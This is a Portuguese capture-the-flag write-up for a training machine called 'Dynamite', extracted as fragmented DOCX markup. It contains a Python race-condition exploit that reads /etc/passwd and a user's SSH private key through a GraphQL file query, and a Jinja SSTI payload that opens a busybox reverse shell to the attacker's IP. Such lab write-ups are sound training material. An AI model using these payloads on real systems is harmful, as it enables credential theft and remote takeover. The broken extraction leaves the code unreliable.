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id06xjcrabty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3t8m4axx4m2o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Dynamite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cahrt67n5qzp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Inicia-se o reconhecimento da máquina pelo scan de portas e serviços. Primeiramente, foi exportado o IP da máquina como variável para poder utilizar em comandos posteriores.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export IP=&lt;IP_DA_MÁQUINA&gt;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Através do scan de portas foram identificados serviços rodando nas portas 22, 80 e 8080. O resultado mostra que existe uma entrada no robots.txt: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 $IP -v -Pn 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0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772150" cy="1799228"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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2631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79922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1 - Scan de portas da máquina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a página web na porta 80 vemos um e-commerce de dinamites, porém os produtos não são carregados. Ao abrir o console vemos um erro de CORS, referenciando o domínio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dynamite.hc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ind w:left="0" w:firstLine="0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6099225" cy="3054461"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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528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9225" cy="305446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2 - Acessando a aplicação é mostrado erro de CORS ao carregar os produtos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4591050" cy="1428750"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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4287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3 - Adicionando o domínio no arquivo /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0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Agora, ao acessar novamente a aplicação pelo hostname os produtos são carregados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/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095875" cy="2808525"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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1010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8085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4 - Produtos carregados na aplicação</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E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Acessando /robots.txt vimos que há uma entrada para o arquivo main.go:</w:t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4262438" cy="843789"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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84378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5 - Arquivo robots.txt possui uma entrada para desabilitar main.go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um produto e visualizar as requisições no modo de desenvolvedor (F12 -&gt; aba de network) é possível visualizar que é utilizada GraphQL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025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4471988" cy="3573506"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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3181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357350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6 - Requisição feita para endpoint /graphql na porta 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027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Interceptando a requisição com o Burp Suite e mandando para o Repeater, é possível alterar a requisição antes de enviá-la. Para descobrir todas as requisições possíveis, podemos testar se a </w:t>
      </w:r>
      <w:hyperlink r:id="rId14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query de introspecção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está habilitada. Para isso, é possível usar a seguinte payload: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{"query":"{__schema{types{name,fields{name}}}}"}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37125"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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2497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1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7 - Realizando a query de introspecção é possível visualizar todo o schema da API.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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ler a resposta, encontra-se um objeto chamado File, que dá a entender que faz a leitura de um arquivo:</w:t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2947988" cy="3075370"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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307537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8 - Resposta da requisição de introspecção mostra um objeto chamado “File”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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7lo9yejx6rri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 fazer uma requisição com o path do arquivo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/etc/passwd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na query, o servidor responde com uma mensagem de path inválido ou perigoso.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{"query": "{ file(path: \"/etc/passwd\") { content } }"}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3772904" cy="4722665"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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801" r="4887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2904" cy="472266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9 - Resposta da requisição para o arquivo /etc/passwd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Aparentemente a aplicação faz um filtro de arquivos maliciosos. Mas como foi visto no robots.txt, pode existir o arquivo do código chamado “main.go” na raiz do projeto. Fazendo a requisição para esse arquivo é visualizado todo o código da aplicação.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{"query": "{ file(path: \"main.go\") { content } }"}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503043" cy="3264011"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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2884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3043" cy="326401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10 - Requisição para arquivo main.go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Tratando o código e fazendo uma revisão, é possível identificar onde está o controle de arquivos proibidos. Existe uma expressão regular (</w:t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4"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">regex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que filtra quais arquivos são permitidos para realização de leitura. É possível visualizar que caso o arquivo solicitado não esteja no formato da regex, a variável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failed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é atribuída com o valor de erro. </w:t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50302" cy="4757531"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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0302" cy="475753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11 - Requisição para arquivo main.go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variável failed é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atribuída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nesse trecho de código, mas ela não é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declarada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dentro dessa função. Ao procurar no código, é observado que ela é declarada nas primeiras linhas, como uma variável global. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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2114550" cy="923497"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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92349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12 - Declaração da variável global de erro “failed”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linguagem Go possui algumas funcionalidades que permitem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concorrência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como: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Goroutines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4"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">threads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ágeis gerenciadas pelo runtime do Go.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Channels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: mecanismo de comunicação entre Goroutines.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Memória compartilhada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: as variáveis em memória podem ser acessadas por múltiplas Goroutines.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Ou seja, isso significa que como a variável “failed” foi declarada como global, seu conteúdo é compartilhado entre as diferentes threads. Assim, se for atribuído um valor “nil” antes da funcionalidade de ler arquivo acessar o conteúdo da variável (por exemplo, enquanto estiver no loop de sleep), será possível ler o arquivo mesmo que ele viole a regex, criando uma vulnerabilidade de </w:t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4"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">race condition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explorá-la, podemos enviar repetidas requisições em pouco tempo, forçando o valor de “failed” ficar como nil. É possível fazer isso enviando alternadamente requisição para um arquivo permitido, como o “main.go”, e na sequência solicitar um arquivo não permitido, como o “/etc/passwd”. Assim, é possível criar um script em  Python para fazer essa exploração.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
      <w:pPr>
        <w:jc w:val="left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#!/usr/bin/env python3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multiprocessing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f'http://{sys.argv[1]}:{sys.argv[2]}'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requests.get(URL)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time.sleep(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worker(path,queue):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"query"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f'{{ file(path: "{path}") {{ name, path, content }} }}'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"application/json"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requests.post(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f"{URL}/graphql"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data=json.dumps(query),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headers=headers)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'passwd'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'root'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queue.put(r.text)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Process(target=worker,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args=(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'main.go'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processes.append(p)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p.start()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Process(target=worker,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args=(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'/etc/passwd'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,queue))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processes.append(p)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p.start()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queue.get()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p.kill()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Esse script faz requisições em paralelo para “main.go” e “/etc/passwd e mostra na tela quando o retorno do arquivo /etc/passwd não for um erro.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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Executa-se o script com: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python3 exploit.py dynamite.hc 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4792634" cy="3499088"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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2634" cy="34990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13 - Explorando o Path Traversal através do Race Condition e obtendo o arquivo /etc/passwd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resultado do script traz o arquivo com os usuários existentes na máquina. É observado um usuário chamado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dyna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Adaptando o script, é possível ler outros arquivos, por exemplo a chave SSH do usuário dyna:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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#!/usr/bin/env python3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multiprocessing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f'http://{sys.argv[1]}:{sys.argv[2]}'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requests.get(URL)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time.sleep(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worker(path,queue):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"query"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f'{{ file(path: "{path}") {{ name, path, content }} }}'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"application/json"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requests.post(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f"{URL}/graphql"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data=json.dumps(query),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headers=headers)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'rsa'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'BEGIN'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r.text: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queue.put(r.text)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Process(target=worker,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args=(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'main.go'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processes.append(p)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p.start()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Process(target=worker,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args=(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'/home/dyna/.ssh/id_rsa'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,queue))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processes.append(p)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p.start()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queue.get()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processes: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p.kill()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resultado da execução do script mostra o conteúdo da chave do usuário dyna:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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4995863" cy="4387392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4387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14 - Explorando o Path Traversal através do Race Condition e obtendo o arquivo /etc/passwd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 chave SSH, é possível se conectar como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dyna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pegar a primeira flag:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C7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4613135" cy="5070713"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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3135" cy="50707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15 - Autenticando com chave SSH do usuário dyna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ual3k3aqzn69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C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Enumerando a máquina, é possível ver que existe um serviço sendo executado na porta 5000, apenas internamente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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576888" cy="1754319"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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6888" cy="175431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16 - Enumerando serviços executados revela um internamente na porta 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Enumerando a máquina, é possível ver que existe um serviço sendo executado na porta 5000. Com a chave SSH, é possível voltar na máquina de ataque e executar um redirecionamento de portas para acessar a aplicação:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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0.0.0.0:5000:localhost:5000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dyna@dynamite.hc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id_rsa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Assim, é possível acessar a aplicação em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localhost:5000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na máquina de ataque:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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03775"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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2081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7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17 - Aplicação de escolta de pedidos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é vista uma aplicação de escolta de pedidos. Enumerando a aplicação, é possível ver que ela está vulnerável a </w:t>
      </w:r>
      <w:hyperlink r:id="rId2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SSTI Jinja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a payload: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{{7*7}}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48225" cy="2739550"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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7395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18 - Ao inserir a payload a aplicação retorna o resultado da multiplicação 7 x 7, indicando possibilidade de SSTI em Jinja -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Rule="auto"/>
        <w:jc w:val="left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Com isso, é possível fazer uma payload para shell reversa. Primeiro, é iniciado um listener na máquina de ataque:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E1">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="left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Rule="auto"/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3090863" cy="359403"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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919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35940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18 - Listener na porta 80 da máquina de ataque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Com a payload abaixo, obtém-se a shell reversa.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{{request.application.__globals__.__builtins__.__import__('os').popen('busybox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&lt;IP_VPN&gt;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bash').read()}}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Assim, é observado que essa aplicação está rodando como root. Por fim, pegamos a flag na pasta /root.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19625" cy="2951654"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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95165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center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0"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 19 - Obtendo a reverse shell e pegando a flag de root.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sectPr>
      <w:headerReference r:id="rId30" w:type="default"/>
      <w:headerReference r:id="rId31" w:type="first"/>
      <w:headerReference r:id="rId32" w:type="even"/>
      <w:footerReference r:id="rId33" w:type="default"/>
      <w:footerReference r:id="rId34" w:type="first"/>
      <w:footerReference r:id="rId35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F">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qnw61nncct6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-866774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21" name="image16.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image16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0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1">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:pict>
        <v:shape id="WordPictureWatermark2" style="position:absolute;width:617.76pt;height:793.486642040147pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:absolute;margin-left:-73.98425196850394pt;mso-position-vertical-relative:margin;mso-position-vertical:absolute;margin-top:-1.246028427965058pt;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId2" o:title="image4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3" name="image23.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image23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Dynamite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57975" cy="299234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4204014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4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6.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9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hyperlink" Target="https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-4r7v-whpg-8rx3" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7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hyperlink" Target="https://app.hackingclub.com/training/training-machines" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png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15.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/graphql.html#introspection" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId1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6.jp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3.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24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